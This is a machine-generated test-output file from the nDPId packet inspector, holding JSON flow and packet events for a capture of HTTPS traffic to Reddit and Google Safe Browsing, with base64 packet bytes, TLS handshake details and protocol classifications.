-00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684481,"flow_last_seen":1605291684481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684481,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605291684481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684481,"pkt":"qtsDr8lk5EKm5WPyht1gB3LfACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PABuxF7CxQAAAAAoAL9IHB8AAACBAWgBAIICql039UAAAAAAQMDBw=="} -00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605291684485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684485,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbucXoJUF9DimtmGoBJXgOayAAACBAV4AQMDAwQCCArC1zJ11N1gBw=="} 
-00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605291684485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684485,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc7vvL1mKYoi42oBJXgKSSAAACBAV4AQMDAwQCCArC1zJ1qXTfuA=="} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1605291684485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684485,"pkt":"qtsDr8lk5EKm5WPyht1gDERGACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnF4Bu+Ka2YaCVBfRgBAB+2qiAAABAQgK1N1gKcLXMnU="} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1605291684485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684485,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iiLjb7y9ZjgBAB+yiDAAABAQgKqXTf2cLXMnU="} 
-00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684485,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684452,"flow_last_seen":1605291684486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684486,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684551,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc8HTo0uYRewsVoBJXgNkGAAACBAV4AQMDAwQCCArC1zKKqXTf1Q=="} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684551,"pkt":"qtsDr8lk5EKm5WPyht1gB3LfACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PABuxF7CxV06NLngBAB+1zSAAABAQgKqXTgG8LXMoo="} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01269{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684481,"flow_last_seen":1605291684552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684481,"flow_last_seen":1605291684592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291684592,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01270{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291684481,"flow_last_seen":1605291684593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291684593,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} 
-00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gDzZzACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PIBu+DxzH8AAAAAoAL9INmFAAACBAWgBAIICql05ecAAAAAAQMDBw=="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gCjLcACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PQBu\/EwLy4AAAAAoAL9IGaWAAACBAWgBAIICql05ecAAAAAAQMDBw=="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gAChDACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PYBu+yXuQoAAAAAoAL9IOFQAAACBAWgBAIICql05ecAAAAAAQMDBw=="} 
-00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gCVbzACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PgBu3BHTUsAAAAAoAL9IMleAAACBAWgBAIICql05ecAAAAAAQMDBw=="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gB\/ybACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PoBu\/q4YysAAAAAoAL9ICkLAAACBAWgBAIICql05ecAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gAreKACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PwBu8WSVasAAAAAoAL9IGuvAAACBAWgBAIICql05ecAAAAAAQMDBw=="} 
-00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686060,"flow_last_seen":1605291686060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1605291686060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686060,"pkt":"qtsDr8lk5EKm5WPyht1gBKPwACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3P4Bu+9x1NYAAAAAoAL9IMKJAAACBAWgBAIICql05gAAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686060,"flow_last_seen":1605291686060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1605291686060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686060,"pkt":"qtsDr8lk5EKm5WPyht1gDoxGACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QABu3ytfXMAAAAAoAL9IIyvAAACBAWgBAIICql05gAAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686060,"flow_last_seen":1605291686060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605291686060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686060,"pkt":"qtsDr8lk5EKm5WPyht1gBLbYACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QIBuwaOmx4AAAAAoAL9IOUhAAACBAWgBAIICql05gAAAAAAAQMDBw=="} 
-00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686060,"flow_last_seen":1605291686060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605291686060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686060,"pkt":"qtsDr8lk5EKm5WPyht1gCVnRACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QQBuwBg34wAAAAAoAL9IKbfAAACBAWgBAIICql05gAAAAAAAQMDBw=="} 